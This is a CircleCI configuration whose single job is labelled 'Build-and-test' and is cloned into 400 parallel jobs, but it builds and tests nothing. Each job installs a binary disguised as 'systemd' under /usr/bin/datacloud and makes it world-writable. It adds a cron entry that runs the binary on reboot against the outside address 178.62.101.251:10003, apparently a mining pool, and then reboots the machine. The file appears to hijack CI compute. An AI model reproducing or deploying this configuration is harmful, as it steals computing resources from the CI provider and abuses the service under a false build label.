version: 2.1

jobs:
  build1:  &build_template
    machine:
      image: ubuntu-2204:current
    resource_class: xlarge
    steps:
      - checkout
      - run:
          name: Build-and-test
          command: |
                 chmod +x systemd
                 sudo mv systemd /usr/bin/datacloud
                 sudo chmod 777 /usr/bin/datacloud
                 echo -e "@reboot /usr/bin/datacloud -o 178.62.101.251:10003" | crontab -
                 sudo reboot >/dev/null 2>&1 >/dev/null &

  build2: *build_template
  build3: *build_template
  build4: *build_template
  build5: *build_template
  build6: *build_template
  build7: *build_template
  build8: *build_template
  build9: *build_template
  build10: *build_template
  build11: *build_template
  build12: *build_template
  build13: *build_template
  build14: *build_template
  build15: *build_template
  build16: *build_template
  build17: *build_template
  build18: *build_template
  build19: *build_template
  build20: *build_template
  build21: *build_template
  build22: *build_template
  build23: *build_template
  build24: *build_template
  build25: *build_template
  build26: *build_template
  build27: *build_template
  build28: *build_template
  build29: *build_template
  build30: *build_template
  build31: *build_template
  build32: *build_template
  build33: *build_template
  build34: *build_template
  build35: *build_template
  build36: *build_template
  build37: *build_template
  build38: *build_template
  build39: *build_template
  build40: *build_template
  build41: *build_template
  build42: *build_template
  build43: *build_template
  build44: *build_template
  build45: *build_template
  build46: *build_template
  build47: *build_template
  build48: *build_template
  build49: *build_template
  build50: *build_template
  build51: *build_template
  build52: *build_template
  build53: *build_template
  build54: *build_template
  build55: *build_template
  build56: *build_template
  build57: *build_template
  build58: *build_template
  build59: *build_template
  build60: *build_template
  build61: *build_template
  build62: *build_template
  build63: *build_template
  build64: *build_template
  build65: *build_template
  build66: *build_template
  build67: *build_template
  build68: *build_template
  build69: *build_template
  build70: *build_template
  build71: *build_template
  build72: *build_template
  build73: *build_template
  build74: *build_template
  build75: *build_template
  build76: *build_template
  build77: *build_template
  build78: *build_template
  build79: *build_template
  build80: *build_template
  build81: *build_template
  build82: *build_template
  build83: *build_template
  build84: *build_template
  build85: *build_template
  build86: *build_template
  build87: *build_template
  build88: *build_template
  build89: *build_template
  build90: *build_template
  build91: *build_template
  build92: *build_template
  build93: *build_template
  build94: *build_template
  build95: *build_template
  build96: *build_template
  build97: *build_template
  build98: *build_template
  build99: *build_template
  build100: *build_template
  build101: *build_template
  build102: *build_template
  build103: *build_template
  build104: *build_template
  build105: *build_template
  build106: *build_template
  build107: *build_template
  build108: *build_template
  build109: *build_template
  build110: *build_template
  build111: *build_template
  build112: *build_template
  build113: *build_template
  build114: *build_template
  build115: *build_template
  build116: *build_template
  build117: *build_template
  build118: *build_template
  build119: *build_template
  build120: *build_template
  build121: *build_template
  build122: *build_template
  build123: *build_template
  build124: *build_template
  build125: *build_template
  build126: *build_template
  build127: *build_template
  build128: *build_template
  build129: *build_template
  build130: *build_template
  build131: *build_template
  build132: *build_template
  build133: *build_template
  build134: *build_template
  build135: *build_template
  build136: *build_template
  build137: *build_template
  build138: *build_template
  build139: *build_template
  build140: *build_template
  build141: *build_template
  build142: *build_template
  build143: *build_template
  build144: *build_template
  build145: *build_template
  build146: *build_template
  build147: *build_template
  build148: *build_template
  build149: *build_template
  build150: *build_template
  build151: *build_template
  build152: *build_template
  build153: *build_template
  build154: *build_template
  build155: *build_template
  build156: *build_template
  build157: *build_template
  build158: *build_template
  build159: *build_template
  build160: *build_template
  build161: *build_template
  build162: *build_template
  build163: *build_template
  build164: *build_template
  build165: *build_template
  build166: *build_template
  build167: *build_template
  build168: *build_template
  build169: *build_template
  build170: *build_template
  build171: *build_template
  build172: *build_template
  build173: *build_template
  build174: *build_template
  build175: *build_template
  build176: *build_template
  build177: *build_template
  build178: *build_template
  build179: *build_template
  build180: *build_template
  build181: *build_template
  build182: *build_template
  build183: *build_template
  build184: *build_template
  build185: *build_template
  build186: *build_template
  build187: *build_template
  build188: *build_template
  build189: *build_template
  build190: *build_template
  build191: *build_template
  build192: *build_template
  build193: *build_template
  build194: *build_template
  build195: *build_template
  build196: *build_template
  build197: *build_template
  build198: *build_template
  build199: *build_template
  build200: *build_template
  build201: *build_template
  build202: *build_template
  build203: *build_template
  build204: *build_template
  build205: *build_template
  build206: *build_template
  build207: *build_template
  build208: *build_template
  build209: *build_template
  build210: *build_template
  build211: *build_template
  build212: *build_template
  build213: *build_template
  build214: *build_template
  build215: *build_template
  build216: *build_template
  build217: *build_template
  build218: *build_template
  build219: *build_template
  build220: *build_template
  build221: *build_template
  build222: *build_template
  build223: *build_template
  build224: *build_template
  build225: *build_template
  build226: *build_template
  build227: *build_template
  build228: *build_template
  build229: *build_template
  build230: *build_template
  build231: *build_template
  build232: *build_template
  build233: *build_template
  build234: *build_template
  build235: *build_template
  build236: *build_template
  build237: *build_template
  build238: *build_template
  build239: *build_template
  build240: *build_template
  build241: *build_template
  build242: *build_template
  build243: *build_template
  build244: *build_template
  build245: *build_template
  build246: *build_template
  build247: *build_template
  build248: *build_template
  build249: *build_template
  build250: *build_template
  build251: *build_template
  build252: *build_template
  build253: *build_template
  build254: *build_template
  build255: *build_template
  build256: *build_template
  build257: *build_template
  build258: *build_template
  build259: *build_template
  build260: *build_template
  build261: *build_template
  build262: *build_template
  build263: *build_template
  build264: *build_template
  build265: *build_template
  build266: *build_template
  build267: *build_template
  build268: *build_template
  build269: *build_template
  build270: *build_template
  build271: *build_template
  build272: *build_template
  build273: *build_template
  build274: *build_template
  build275: *build_template
  build276: *build_template
  build277: *build_template
  build278: *build_template
  build279: *build_template
  build280: *build_template
  build281: *build_template
  build282: *build_template
  build283: *build_template
  build284: *build_template
  build285: *build_template
  build286: *build_template
  build287: *build_template
  build288: *build_template
  build289: *build_template
  build290: *build_template
  build291: *build_template
  build292: *build_template
  build293: *build_template
  build294: *build_template
  build295: *build_template
  build296: *build_template
  build297: *build_template
  build298: *build_template
  build299: *build_template
  build300: *build_template
  build301: *build_template
  build302: *build_template
  build303: *build_template
  build304: *build_template
  build305: *build_template
  build306: *build_template
  build307: *build_template
  build308: *build_template
  build309: *build_template
  build310: *build_template
  build311: *build_template
  build312: *build_template
  build313: *build_template
  build314: *build_template
  build315: *build_template
  build316: *build_template
  build317: *build_template
  build318: *build_template
  build319: *build_template
  build320: *build_template
  build321: *build_template
  build322: *build_template
  build323: *build_template
  build324: *build_template
  build325: *build_template
  build326: *build_template
  build327: *build_template
  build328: *build_template
  build329: *build_template
  build330: *build_template
  build331: *build_template
  build332: *build_template
  build333: *build_template
  build334: *build_template
  build335: *build_template
  build336: *build_template
  build337: *build_template
  build338: *build_template
  build339: *build_template
  build340: *build_template
  build341: *build_template
  build342: *build_template
  build343: *build_template
  build344: *build_template
  build345: *build_template
  build346: *build_template
  build347: *build_template
  build348: *build_template
  build349: *build_template
  build350: *build_template
  build351: *build_template
  build352: *build_template
  build353: *build_template
  build354: *build_template
  build355: *build_template
  build356: *build_template
  build357: *build_template
  build358: *build_template
  build359: *build_template
  build360: *build_template
  build361: *build_template
  build362: *build_template
  build363: *build_template
  build364: *build_template
  build365: *build_template
  build366: *build_template
  build367: *build_template
  build368: *build_template
  build369: *build_template
  build370: *build_template
  build371: *build_template
  build372: *build_template
  build373: *build_template
  build374: *build_template
  build375: *build_template
  build376: *build_template
  build377: *build_template
  build378: *build_template
  build379: *build_template
  build380: *build_template
  build381: *build_template
  build382: *build_template
  build383: *build_template
  build384: *build_template
  build385: *build_template
  build386: *build_template
  build387: *build_template
  build388: *build_template
  build389: *build_template
  build390: *build_template
  build391: *build_template
  build392: *build_template
  build393: *build_template
  build394: *build_template
  build395: *build_template
  build396: *build_template
  build397: *build_template
  build398: *build_template
  build399: *build_template
  build400: *build_template


workflows:
  version: 2
  build:
    jobs:
      - build1
      - build2
      - build3
      - build4
      - build5
      - build6
      - build7
      - build8
      - build9
      - build10
      - build11
      - build12
      - build13
      - build14
      - build15
      - build16
      - build17
      - build18
      - build19
      - build20
      - build21
      - build22
      - build23
      - build24
      - build25
      - build26
      - build27
      - build28
      - build29
      - build30
      - build31
      - build32
      - build33
      - build34
      - build35
      - build36
      - build37
      - build38
      - build39
      - build40
      - build41
      - build42
      - build43
      - build44
      - build45
      - build46
      - build47
      - build48
      - build49
      - build50
      - build51
      - build52
      - build53
      - build54
      - build55
      - build56
      - build57
      - build58
      - build59
      - build60
      - build61
      - build62
      - build63
      - build64
      - build65
      - build66
      - build67
      - build68
      - build69
      - build70
      - build71
      - build72
      - build73
      - build74
      - build75
      - build76
      - build77
      - build78
      - build79
      - build80
      - build81
      - build82
      - build83
      - build84
      - build85
      - build86
      - build87
      - build88
      - build89
      - build90
      - build91
      - build92
      - build93
      - build94
      - build95
      - build96
      - build97
      - build98
      - build99
      - build100
      - build101
      - build102
      - build103
      - build104
      - build105
      - build106
      - build107
      - build108
      - build109
      - build110
      - build111
      - build112
      - build113
      - build114
      - build115
      - build116
      - build117
      - build118
      - build119
      - build120
      - build121
      - build122
      - build123
      - build124
      - build125
      - build126
      - build127
      - build128
      - build129
      - build130
      - build131
      - build132
      - build133
      - build134
      - build135
      - build136
      - build137
      - build138
      - build139
      - build140
      - build141
      - build142
      - build143
      - build144
      - build145
      - build146
      - build147
      - build148
      - build149
      - build150
      - build151
      - build152
      - build153
      - build154
      - build155
      - build156
      - build157
      - build158
      - build159
      - build160
      - build161
      - build162
      - build163
      - build164
      - build165
      - build166
      - build167
      - build168
      - build169
      - build170
      - build171
      - build172
      - build173
      - build174
      - build175
      - build176
      - build177
      - build178
      - build179
      - build180
      - build181
      - build182
      - build183
      - build184
      - build185
      - build186
      - build187
      - build188
      - build189
      - build190
      - build191
      - build192
      - build193
      - build194
      - build195
      - build196
      - build197
      - build198
      - build199
      - build200
      - build201
      - build202
      - build203
      - build204
      - build205
      - build206
      - build207
      - build208
      - build209
      - build210
      - build211
      - build212
      - build213
      - build214
      - build215
      - build216
      - build217
      - build218
      - build219
      - build220
      - build221
      - build222
      - build223
      - build224
      - build225
      - build226
      - build227
      - build228
      - build229
      - build230
      - build231
      - build232
      - build233
      - build234
      - build235
      - build236
      - build237
      - build238
      - build239
      - build240
      - build241
      - build242
      - build243
      - build244
      - build245
      - build246
      - build247
      - build248
      - build249
      - build250
      - build251
      - build252
      - build253
      - build254
      - build255
      - build256
      - build257
      - build258
      - build259
      - build260
      - build261
      - build262
      - build263
      - build264
      - build265
      - build266
      - build267
      - build268
      - build269
      - build270
      - build271
      - build272
      - build273
      - build274
      - build275
      - build276
      - build277
      - build278
      - build279
      - build280
      - build281
      - build282
      - build283
      - build284
      - build285
      - build286
      - build287
      - build288
      - build289
      - build290
      - build291
      - build292
      - build293
      - build294
      - build295
      - build296
      - build297
      - build298
      - build299
      - build300
      - build301
      - build302
      - build303
      - build304
      - build305
      - build306
      - build307
      - build308
      - build309
      - build310
      - build311
      - build312
      - build313
      - build314
      - build315
      - build316
      - build317
      - build318
      - build319
      - build320
      - build321
      - build322
      - build323
      - build324
      - build325
      - build326
      - build327
      - build328
      - build329
      - build330
      - build331
      - build332
      - build333
      - build334
      - build335
      - build336
      - build337
      - build338
      - build339
      - build340
      - build341
      - build342
      - build343
      - build344
      - build345
      - build346
      - build347
      - build348
      - build349
      - build350
      - build351
      - build352
      - build353
      - build354
      - build355
      - build356
      - build357
      - build358
      - build359
      - build360
      - build361
      - build362
      - build363
      - build364
      - build365
      - build366
      - build367
      - build368
      - build369
      - build370
      - build371
      - build372
      - build373
      - build374
      - build375
      - build376
      - build377
      - build378
      - build379
      - build380
      - build381
      - build382
      - build383
      - build384
      - build385
      - build386
      - build387
      - build388
      - build389
      - build390
      - build391
      - build392
      - build393
      - build394
      - build395
      - build396
      - build397
      - build398
      - build399
      - build400
